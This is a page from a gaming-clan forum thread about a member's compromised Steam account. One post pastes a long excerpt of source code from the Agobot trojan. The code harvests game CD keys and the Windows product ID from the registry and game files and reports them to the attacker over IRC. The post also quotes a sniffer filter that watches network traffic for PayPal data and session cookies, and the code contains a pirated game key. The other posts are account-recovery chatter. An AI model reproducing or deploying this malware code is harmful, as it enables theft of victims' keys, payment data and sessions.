Page 3 of 4 FirstFirst 1234 LastLast
Results 21 to 30 of 32

Thread: Dot's account is comprimised

  1. #21
    Queen of the Internet Kung Fu Master
    Join Date
    Oct 2006
    Location
    Atlanta
    Posts
    1.879
    Rep Power
    19

    Default

    If you make a 50 digit password, brute force would not be able to solve it in ten times the age of the universe even if all the matter in the universe was used to build a giant computer specifically for the purpose of cracking it.
    [img]http://unix.org.au/~brett/gif/waldioaw1.gif[/img]
    [color=royalblue][b]Forum and Server Administrator[/b][/color]
    PasTieZ: I am scared now thanks nat
    natalyaaf: D:
    PasTieZ: sio is going to ass rape me

    NatalyaAF ウラヌス: i am the baninator :D
    word jackd ת/ύ: ha the baninator and the pwninator

  2. #22
    N/U Commando
    Join Date
    Jun 2008
    Location
    pittsburgh PA
    Age
    38
    HlStats

    HLStatsX Ranking for STEAM_0:1:19135140
    Posts
    447
    Rep Power
    16

    Default

    i got my 4 dig hacked like a year ago by just adding someone to me steam friends i dont know how they did it though i was pissed as hell
    [url=http://profile.xfire.com/fatall33t][img]http://miniprofile.xfire.com/bg/sh/type/0/fatall33t.png[/img][/url]
    <a href="http://www.gametracker.com/server_info/74.86.201.242:27018/" target="_blank"><img src="http://cache.www.gametracker.com/server_info/74.86.201.242:27018/b_560x95.png" border="0" width="560" height="95" /></a>

  3. #23
    g0d! Contributing Member siosios's Avatar
    Join Date
    Oct 2006
    Location
    In a cardboard box
    Age
    50
    HlStats

    HLStatsX Ranking for STEAM_0:1:13488560
    Posts
    13.546
    Blog Entries
    12
    Rep Power
    10

    Default

    some homemade viruses have built in key loggers and search the registry for game keys. if they find bank info or a game key they report it via irc to the owner of the virus.

    example virus's that do this are the old and outdated agobot or the sdbot so on so forth.

    here is the ago bots game key search code:

    Code:
    #include "main.h"
    #include "mainctrl.h"
    #include "harvest_cdkeys.h"
    #ifdef WIN32
    struct items
    {
    char *GameName;
    HKEY RootKey;
    char *SubKey;
    char *ValueName;
    };
    #define MAX_KEY_LENGTH 2048
    #define MAX_VALUE_NAME 16383
    /* Leet cdkey code by thegeek:)
    * CDKey List, With GameNames and Registry Entries £
    * Here Is Where You Would Add New Games If You Wanted Too
    * TODO: add support for getting from files.
    */
    items CDKeyList[] =
    {
    { "[Windows Product ID: ", HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion", "ProductID" },
    { "[Battlefield 1942: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942\\ergc", "" },
    { "[Battlefield 1942: Secret Weapons Of WWII: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942 Secret Weapons of WWII\\ergc", "" },
    { "[Battlefield 1942: The Road To Rome: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942 The Road to Rome\\ergc", "" },
    { "[Battlefield 1942: Vietnam:", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield Vietnam\\ergc", "" },
    { "[Black and White: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Black and White\\ergc", "" },
    { "[Command and Conquer: Generals: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Generals\\ergc", "" },
    { "[Command and Conquer: Generals: Zero Hour: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Command and Conquer Generals Zero Hour\\ergc", "" },
    { "[Command and Conquer: Red Alert2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Westwood\\Red Alert 2", "Serial" },
    { "[Command and Conquer: Tiberian Sun: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Westwood\\Tiberian Sun", "Serial" },
    { "[Counter-Strike: ", HKEY_CURRENT_USER, "Software\\Valve\\CounterStrike\\Settings", "Key" },
    { "[FIFA 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\FIFA 2002\\ergc", "" },
    { "[FIFA 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\FIFA 2003\\ergc", "" },
    { "[Freedom Force: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Distribution\\Freedom Force\\ergc", "" },
    { "[Global Operations: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Global Operations\\ergc", "" },
    { "[Gunman Chronicles: ", HKEY_CURRENT_USER, "Software\\Valve\\Gunman\\Settings", "Key" },
    { "[Half-Life: ", HKEY_CURRENT_USER, "Software\\Valve\\Half-Life\\Settings", "Key" },
    { "[Hidden and Dangerous 2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Illusion Softworks\\Hidden & Dangerous 2", "key" },
    { "[IGI2: Covert Strike: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\IGI 2 Retail\\CDKey", "CDkey" },
    { "[Industry Giant 2: ", HKEY_CURRENT_USER, "Software\\JoWooD\\InstalledGames\\IG2", "prvkey" },
    { "[James Bond 007: Nightfire: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\James Bond 007 Nightfire\\ergc", "" },
    { "[Medal of Honor: Allied Assault: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault\\ergc", "" },
    { "[Medal of Honor: Allied Assault: Breakthrough ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault Breakthrough\\ergc", "" },
    { "[Medal of Honor: Allied Assault: Spearhead ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault Spearhead\\ergc", "" },
    { "[Nascar Racing 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\Nascar Racing 2002\\ergc", "" },
    { "[Nascar Racing 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\Nascar Racing 2003\\ergc", "" },
    { "[NHL 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\NHL 2002\\ergc", "" },
    { "[NHL 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\NHL 2003\\ergc", "" },
    { "[Need For Speed: Hot Pursuit 2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Need For Speed Hot Pursuit 2\\ergc", "" },
    { "[Need For Speed: Underground: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Need For Speed Underground\\ergc", "" },
    { "[Neverwinter Nights: ", HKEY_LOCAL_MACHINE, "Software\\BioWare\\NWN\\Neverwinter","Key" },
    { "[Ravenshield: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Red Storm Entertainment\\RAVENSHIELD", ""},
    { "[Shogun: Total War: Warlord Edition: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Shogun Total War - Warlord Edition\\ergc", "" },
    { "[Soldiers Of Anarchy: ", HKEY_CURRENT_USER, "Software\\Silver Style Entertainment\\Soldiers Of Anarchy\\Settings", "CDKey" },
    { "[Soldier Of Fortune 2: ",HKEY_LOCAL_MACHINE, "Software\\Activision\\Soldier of Fortune II - Double Helix", "sof2key" },
    { "[The Gladiators: ", HKEY_CURRENT_USER, "Software\\Eugen Systems\\The Gladiators", "RegNumber" },
    { "[Unreal Tournament 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Unreal Technology\\Installed Apps\\UT2003", "CDKey" },
    { "[Unreal Tournament 2004: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Unreal Technology\\Installed Apps\\UT2004", "CDKey" },
    
    };
    #endif // WIN32
    char szKey[1024];
    char *szLogText;
    /*
    =======================================================================================================================
    =======================================================================================================================
    */
    void CHarvest_CDKeys::Init(void)
    {
    REGCMD(m_cmdCDKeys, "harvest.cdkeys", "makes the bot get a list of cdkeys", false, this);
    }
    /*
    =======================================================================================================================
    =======================================================================================================================
    */
    bool CHarvest_CDKeys::HandleCommand(CMessage *pMsg)
    {
    #ifdef WIN32
    if(!pMsg->sCmd.Compare("harvest.cdkeys"))
    {
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    #define arraysize(x) (sizeof(x) / sizeof(x[0]))
    DWORD dwSize = 2048;
    unsigned char szBuffer[2048];
    int i=0;
    char *UserKey = (char *) malloc(128);
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    szLogText = new char[2048];
    memset(szLogText, 0, 2048);
    if (!g_pMainCtrl->m_cBot.cdkey_windows.bValue){
    i=1;}
    for(i;i < arraysize(CDKeyList); i++)
    {
     
    if(CDKeyList[i].RootKey != HKEY_CURRENT_USER)
    {
    /*~~~~~~~~~~~~~~*/
    HKEY rk = NULL;
    /*~~~~~~~~~~~~~~*/
    sprintf(UserKey, "%s", CDKeyList[i].SubKey);
    memset(szBuffer, 0, sizeof(szBuffer));
    memset(szKey, 0, sizeof(szKey));
    memset(szLogText, 0, sizeof(szLogText));
    if(RegOpenKeyEx(CDKeyList[i].RootKey, UserKey, 0, KEY_READ, &rk) != ERROR_SUCCESS)
    {
    }
    if(RegQueryValueEx(rk, CDKeyList[i].ValueName, NULL, NULL, szBuffer, &dwSize) != ERROR_SUCCESS)
    {
    }
    if(RegQueryValueEx(rk, CDKeyList[i].ValueName, NULL, NULL, szBuffer, &dwSize) == ERROR_SUCCESS)
    {
    g_pMainCtrl->m_cIRC.SendFormat
    (
    pMsg->bSilent,
    pMsg->bNotice,
    pMsg->sReplyTo.Str(),
    "%s%s]\n",
    CDKeyList[i].GameName,
    szBuffer
    );
    }
    RegCloseKey(rk);
    /*
    * strcat(szLogText, rKeyString); £
    * ReadKey(szKey, CDKeyList[i].GameName, CDKeyList[i].RootKey,CDKeyList[i].SubKey,
    * CDKeyList[i].ValueName, dwSize, szBuffer);
    * g_cMainCtrl.m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice,
    * pMsg->sReplyTo.Str(), szKey);
    */
    }
    if(CDKeyList[i].RootKey == HKEY_CURRENT_USER)
    {
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    CHAR achKey[2048]; /* buffer for subkey name */
    DWORD cbName; /* size of name string */
    CHAR achClass[MAX_PATH] = ""; /* buffer for class name */
    DWORD cchClassName = MAX_PATH; /* size of class string */
    DWORD cSubKeys = 0; /* number of subkeys */
    DWORD cbMaxSubKey; /* longest subkey size */
    DWORD cchMaxClass; /* longest class string */
    DWORD cValues; /* number of values for key */
    DWORD cchMaxValue; /* longest value name */
    DWORD cbMaxValueData; /* longest value data */
    DWORD cbSecurityDescriptor; /* size of security descriptor */
    FILETIME ftLastWriteTime; /* last write time */
    DWORD retCode;
    int u;
    CHAR achValue[MAX_VALUE_NAME];
    DWORD cchValue = MAX_VALUE_NAME;
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    /*
    * g_cMainCtrl.m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice,
    * pMsg->sReplyTo.Str(), CDKeyList[i].GameName); £
    * Get the class name and the value count.
    */
    retCode = RegQueryInfoKey
    (
    CDKeyList[i].RootKey, /* key handle */
    achClass, /* buffer for class name */
    &cchClassName, /* size of class string */
    NULL, /* reserved */
    &cSubKeys, /* number of subkeys */
    &cbMaxSubKey, /* longest subkey size */
    &cchMaxClass, /* longest class string */
    &cValues, /* number of values for this key */
    &cchMaxValue, /* longest value name */
    &cbMaxValueData, /* longest value data */
    &cbSecurityDescriptor, /* security descriptor */
    &ftLastWriteTime /* last write time */
    );
    /* Enumerate the subkeys, until RegEnumKeyEx fails. */
    if(cSubKeys)
    {
    for(u = 0; u < cSubKeys; u++)
    {
    cbName = MAX_KEY_LENGTH;
    retCode = RegEnumKeyEx(HKEY_USERS, u, achKey, &cbName, NULL, NULL, NULL, &ftLastWriteTime);
    if(retCode == ERROR_SUCCESS)
    {
    /*~~~~~~~~~~~~~~*/
    HKEY rk = NULL;
    /*~~~~~~~~~~~~~~*/
    sprintf(UserKey, "%s\\%s", achKey, CDKeyList[i].SubKey);
    memset(szBuffer, 0, sizeof(szBuffer));
    memset(szKey, 0, sizeof(szKey));
    if(RegOpenKeyEx(HKEY_USERS, UserKey, 0, KEY_READ, &rk) != ERROR_SUCCESS)
    {
    }
    if
    (
    RegQueryValueEx
    (
    rk,
    CDKeyList[i].ValueName,
    NULL,
    NULL,
    szBuffer,
    &dwSize
    ) != ERROR_SUCCESS
    )
    {
    RegCloseKey(rk);
    }
    if
    (
    RegQueryValueEx
    (
    rk,
    CDKeyList[i].ValueName,
    NULL,
    NULL,
    szBuffer,
    &dwSize
    ) == ERROR_SUCCESS
    )
    {
    g_pMainCtrl->m_cIRC.SendFormat
    (
    pMsg->bSilent,
    pMsg->bNotice,
    pMsg->sReplyTo.Str(),
    "%s%s]\n",
    CDKeyList[i].GameName,
    szBuffer
    );
    }
    RegCloseKey(rk);
    }
    }
    }
    }
    }
     
    
    HKEY hkey=NULL; unsigned char szDataBuf[128]; unsigned char szDataBuf2[1024]; char line[100];
    dwSize = 128; LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Activision\\Soldier of Fortune II - Double Helix", 0, KEY_READ, &hkey);
    if(RegQueryValueEx(hkey, "InstallPath", NULL, NULL, szDataBuf2, &dwSize)== ERROR_SUCCESS)
    { char *szPath = (char*)malloc(MAX_PATH); FILE *fp;
    sprintf(szPath, "%s\\base\\mp\\%s", szDataBuf2, "sof2key");
    if((fp=fopen(szPath,"r"))!=NULL)
    { if(fgets(line, 100, fp))
    if(!strstr(line, "mtkwftmkemfew3p3b7"))
    { g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
    "Found SOF2 CDKey (%s).", line); }
    fclose(fp); }
    if(szPath) free(szPath); }
    RegCloseKey(hkey);
    /*
    Call of Duty
    */
    // Warezed: TSH3XSWTYPWGUUTXE660
    dwSize = 128; lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Activision\\Call of Duty", 0, KEY_READ, &hkey);
    if(RegQueryValueEx(hkey, "InstallPath", NULL, NULL, szDataBuf2, &dwSize)== ERROR_SUCCESS)
    { char *szPath = (char*)malloc(MAX_PATH); FILE *fp;
    sprintf(szPath, "%s\\main\\%s", szDataBuf2, "codkey");
    if((fp=fopen(szPath,"r"))!=NULL)
    { if(fgets(line, 100, fp))
    if(!strstr(line, "TSH3XSWTYPWGUUTXE660"))
    g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
    "Found COD CDKey (%s).", line);
    fclose(fp); }
    if(szPath) free(szPath); }
    RegCloseKey(hkey);
     
     
     
    return true;
    }
    #endif // WIN32
    return false;
    }
    
    One part of the sniffer code (this one looks for paypal):

    Code:
    
    // Like paypals? ;-D How about cookies? YUMMEH! -rain
    bool IsSuspiciousHTTP(const char *szBuf) {
    if(strstr(szBuf, "HTTP sniff")) return false;
    if(strstr(szBuf, g_pMainCtrl->m_sUserName.CStr())) return false;
    if(strstr(szBuf, g_pMainCtrl->m_cBot.si_mainchan.sValue.CStr())) return false;
    if(strstr(szBuf, "paypal")) return true;
    if(strstr(szBuf, "PAYPAL")) return true;
    if(strstr(szBuf, "PAYPAL.COM")) return true;
    if(strstr(szBuf, "paypal.com")) return true;
    if(strstr(szBuf, "Set-Cookie:")) return true;
    return false; }
    
    im sure the newer trojans out there are more advanced but this is how they can get your info also.
    ------------------------------------------------

    |W0rd|SexualTurtletara420ת/ύ: Hey there daddy..

    ------------------------------------------------
    \\\ ///
    ( @ @ )
    .....o00o.(_).o00o.....


    ------------------------------------------

  4. #24
    Trailor Trash
    Join Date
    Aug 2009
    Location
    :-o USA
    Age
    34
    HlStats

    HLStatsX Ranking for STEAM_0:1:3496656
    Posts
    69
    Rep Power
    15

    Default

    so VAC ban is for individual servers right? if so then ban me from all NU and NI servers that way i cant get VAC banned from those servers at least..................until i get stuff in order

  5. #25
    Kung Fu Master
    Join Date
    Jan 2008
    Location
    Long Island, New York
    HlStats

    HLStatsX Ranking for STEAM_0:1:16187503
    Posts
    1.682
    Rep Power
    18

    Default

    Whats your steam ID?

    Quote Originally Posted by dvxAznSensationxvb View Post
    so VAC ban is for individual servers right? if so then ban me from all NU and NI servers that way i cant get VAC banned from those servers at least..................until i get stuff in order
    [center][IMG]http://i12.photobucket.com/albums/a205/tomca631/jackd_gif2.gif[/IMG][/center]

    [center]U%|}[/center]

    [center][COLOR="Red"]|Ň/Ú| siosios: thise 2 cab cgat at ne wgeb u waje yo ub ub the morning im too drunk right noiw[/COLOR][/center]

  6. #26
    Trailor Trash
    Join Date
    Aug 2009
    Location
    :-o USA
    Age
    34
    HlStats

    HLStatsX Ranking for STEAM_0:1:3496656
    Posts
    69
    Rep Power
    15

    Default

    Steam_0:1:3496656
    ---------------------------------------------------------------------------------------------------------------------
    hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?
    Last edited by dvxAznSensationxvb; 09-20-2009 at 01:45 PM. Reason: Automerged Doublepost
    ±‡*`'*^~-., ,.-~^*'´*‡±
    ~~!~¤. アジア感覚 .¤~!~~
    ±‡*`'*^~-., ,.-~^*'´*‡±

  7. #27
    Banned Kung Fu Master
    Join Date
    Mar 2008
    Location
    Fuckin Ohio!
    HlStats

    HLStatsX Ranking for STEAM_0:0:28811228
    Posts
    2.438
    Rep Power
    0

    Default

    Quote Originally Posted by dvxAznSensationxvb View Post
    Steam_0:1:3496656
    ---------------------------------------------------------------------------------------------------------------------
    hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?
    yupp
    and he deleted our whole friends list.
    but he hasnt changed my accnt info which has n/us site and group info on it so be careful guys

  8. #28
    Kung Fu Master
    Join Date
    Jan 2008
    Location
    Long Island, New York
    HlStats

    HLStatsX Ranking for STEAM_0:1:16187503
    Posts
    1.682
    Rep Power
    18

    Default

    Steam ID is invalid.

    Quote Originally Posted by dvxAznSensationxvb View Post
    Steam_0:1:3496656
    ---------------------------------------------------------------------------------------------------------------------
    hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?
    [center][IMG]http://i12.photobucket.com/albums/a205/tomca631/jackd_gif2.gif[/IMG][/center]

    [center]U%|}[/center]

    [center][COLOR="Red"]|Ň/Ú| siosios: thise 2 cab cgat at ne wgeb u waje yo ub ub the morning im too drunk right noiw[/COLOR][/center]

  9. #29
    Banned Kung Fu Master
    Join Date
    Mar 2008
    Location
    Fuckin Ohio!
    HlStats

    HLStatsX Ranking for STEAM_0:0:28811228
    Posts
    2.438
    Rep Power
    0

    Default

    Sent my shit in to valve, hopefully this turns back soon.

  10. #30
    Trailor Trash
    Join Date
    Aug 2009
    Location
    :-o USA
    Age
    34
    HlStats

    HLStatsX Ranking for STEAM_0:1:3496656
    Posts
    69
    Rep Power
    15

    Default

    This is awful..... I'm here and oneforty is outranking me as we speak!!!!! Dam and everyone is probably worried sick like drank and aim and sky and nat and Nadia and especially army :-/
    ±‡*`'*^~-., ,.-~^*'´*‡±
    ~~!~¤. アジア感覚 .¤~!~~
    ±‡*`'*^~-., ,.-~^*'´*‡±

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. New Account
    By Skyline in forum N00B Unlimited General Chat
    Replies: 5
    Last Post: 05-05-2009, 04:44 PM
  2. cafe account
    By kodiakbutt2 in forum N00B Unlimited General Chat
    Replies: 7
    Last Post: 03-28-2009, 03:02 AM
  3. UH OH im going to lose my steam account... OH NOES!
    By siosios in forum N00B Unlimited General Chat
    Replies: 5
    Last Post: 11-17-2008, 04:36 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •